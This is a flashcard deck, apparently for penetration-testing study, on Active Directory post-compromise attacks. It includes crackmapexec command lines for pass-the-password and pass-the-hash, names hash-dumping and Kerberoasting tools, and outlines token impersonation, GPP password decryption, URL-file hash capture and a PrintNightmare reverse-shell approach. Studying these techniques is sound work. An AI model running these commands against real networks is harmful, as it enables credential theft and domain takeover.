Active Directory: Post-Compromise Attacks Flashcards

1
Q

What is CrackMapExec?

A

It’s a post-compromise tool for penetration testing against networks. It collects Active Directory information to conduct lateral movements.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is a Pass the Password Attack?

A

It’s an attack where the hacker uses obtained passwords to try to authenticate on other machines. With CME, you can try to authenticate to multiple machines in the network and see which one of them you have access with the provided credentials.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What command can be used to perform a Pass the Password attack? What should you look for in the output?

A
$ crackmapexec smb network_ip/CIDR -u username -d domain.name -p password

After running it, you should look for the machines with the “(Pwn3d!)” result because this indicates that you can authenticate remotely with the provided credentials.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

The Pwn3d machines (Pass the password attack)

What tool can be used to get a shell?

A

psexec.py

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

The Pwn3d machines (Pass the password attack)

What tool can be used to dump SAM hashes?

A

secretsdump.py

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is a Pass the Hash attack?

A

It’s a type of attack where a hacker uses captured password hashes to authenticate to other machines and perform lateral movement in the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What command can be used to perform a Pass the Hash attack? What should you look in the output?

A
$ crackmapexec smb network_ip/CIDR -u username -H hash --local-auth

You should look for machines with the green “[+]” marker or the “(Pwn3d!)” string.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What are the two types of access tokens?

A
  • Delegation Tokens: Tokens that are created when a user interactively login into a system using his credentials.
  • Impersonation Tokens: Tokens that are created when a user non-interactively login into a system, so the user is not prompted for credentials. Usually this type of token is created after the delegation ones and uses established credentials from a past interactive authentication.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is Token Impersonation?

A

It’s a Windows post-compromise technique that allows an attacker to steal the access token of a logged-on user without knowing his credentials and impersonate him to perform actions with his level of privilege.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What can be achieved with token impersonation?

A

This technique is effective for privillege escalation and lateral movements, since the attacker can obtain domain admin privilege if a logged-on user is a domain admin and also can use the stolen access token to pivot to other domain machines in the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is the requirement to perform a token impersonation?

A

The attacker must obtain local admin privileges on the target machine in order to steal its tokens.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

For how long is an access token available on a machine?

A

Until the machine is rebooted.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is Kerberoasting?

A

It’s a post-exploitation technique that abuses the Kerberos authentication protocol to request a TGS ticket and crack it offline, avoiding AD account lockouts.
The steps are:
1. Attacker requests a TGT ticket, providing an obtained NLTM hash;
2. Receives the TGT and requests a TGS, presenting the received TGT;
3. Receives the TGS, encripted with the server’s account hash;
4. Proceeds to crack the TGS offline;

Important: These requests (For TGT and TGS) are all made to a domain controller.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Kerberoasting

What tool can be used to grab a TGS?

A

GetUserSPNs.py

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is GPP and how it can be attacked?

A

Group Policies Preferences is a toll that provides advanced functionalities to administrators for creating and managing account policies in a Windows domain network. These policies allow the creation of local accounts with embedded credentials for various purposes.
For security, these embedded credentials are encripted with AES and stored as cpassword in a file called Groups.xml, inside the policy folder. The main problem is that the encryption key is publically available, so if an attacker finds this cpassword, he can decrypt it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is a URL file attack?

A

This technique consists in finding a writable file share and placing a .url file to capture hashes with responder. Any user who opens the folder will get its hash captured.

17
Q

What can you do after getting access to a Kerberos ticket account?

A

Generate golden or silver tickets.
Use this account to request tickets to access any machine in the domain, own the domain.

18
Q

What is the Print Nightmare vulnerability?

A

It’s a RCE vulnerability that abuses the Windows print Spooler, specifically the RpcAddPrinterDriverEx() function. This function is used to install printer drivers remotely and any authenticated user have the ability to install any print driver to windows. This can be used to escalate privileges to a domain admin level. We have to create a malicious dll with a reverse shell in it and host it using SMB server, then we will run the exploit.